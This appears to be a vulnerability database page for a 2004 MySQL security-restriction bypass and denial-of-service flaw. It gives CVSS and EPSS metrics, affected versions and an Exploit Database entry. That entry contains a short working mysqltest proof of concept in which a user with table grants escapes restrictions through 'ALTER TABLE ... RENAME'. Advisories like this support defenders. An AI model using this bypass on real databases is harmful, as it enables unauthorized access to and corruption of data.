Metrics
Metrics |
Score |
Severity |
CVSS Vector |
Source |
V2 |
7.5 |
|
AV:N/AC:L/Au:N/C:P/I:P/A:P |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 24669
Publication date : 2004-10-07 22h00 +00:00
Author : Oleksandr Byelkin
EDB Verified : Yes
source: https://www.securityfocus.com/bid/11357/info
MySQL is reported prone to multiple local vulnerabilities. Exploiting these issues may allow an attacker to bypass security restrictions or cause a denial-of-service condition in the application.
Rportedly, an attacker can bypass certain security restrictions and gain access to and corrupt potentially sensitive data due to an error in 'ALTER TABLE ... RENAME' operations.
A denial-of-service condition occurs when multiple threads ALTER MERGE tables to change the UNION.
Due to a lack of details, further information is not available at the moment. This BID will be updated as more information becomes available.
drop database if exists mysqltest;
connect (root,localhost,root,,test,0,mysql-master.sock);
connection root;
--disable_warnings
create database if not exists mysqltest;
--enable_warnings
create table mysqltest.t1 (a int,b int,c int);
grant all on mysqltest.t1 to mysqltest_1@localhost;
connect (user1,localhost,mysqltest_1,,mysqltest,0,mysql-master.sock);
connection user1;
alter table t1 rename t2;
Products Mentioned
Configuraton 0
Mysql>>Mysql >> Version From (including) 4.1.0 To (including) 4.1.2
Mysql>>Mysql >> Version From (including) 5.0.0 To (including) 5.0.1
Oracle>>Mysql >> Version From (excluding) 3.20 To (excluding) 3.23.59
Oracle>>Mysql >> Version From (including) 4.0.0 To (excluding) 4.0.19
Configuraton 0
Debian>>Debian_linux >> Version 3.0
References